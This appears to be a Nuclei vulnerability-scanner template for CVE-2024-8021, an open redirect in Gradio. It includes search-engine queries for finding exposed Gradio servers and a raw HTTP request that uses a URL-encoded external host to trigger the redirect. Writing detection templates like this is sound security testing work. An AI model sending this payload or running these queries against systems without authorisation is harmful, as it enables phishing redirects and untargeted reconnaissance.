41 lines
1.2 KiB
YAML
41 lines
1.2 KiB
YAML
id: CVE-2024-8021
|
|
|
|
info:
|
|
name: Gradio - Open Redirect
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
Gradio allows an open redirect bypass via URL encoding, enabling attackers to redirect users to malicious sites. This can lead to phishing attacks and loss of trust in the application.
|
|
reference:
|
|
- https://huntr.com/bounties/adc23067-ec04-47ef-9265-afd452071888
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: gradio_project
|
|
product: gradio
|
|
shodan-query:
|
|
- http.html:"__gradio_mode__"
|
|
- http.title:"gradio"
|
|
fofa-query:
|
|
- body="__gradio_mode__"
|
|
- title="gradio"
|
|
google-query: intitle:"gradio"
|
|
tags: cve,cve2024,redirect,oast,gradio
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /file=http%3A%2F%2Foast.pro/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 302
|
|
# digest: 4a0a004730450221009ecac0edb5930f78c33c102dc0e4153c9ecd7767bb82f2f3d68f829e647e53e5022043faa3cd5c1f44e8940d77fb4368d7cbf2dd968abcf6decfc59c87f85704c959:922c64590222798bb761d5b6d8e72950 |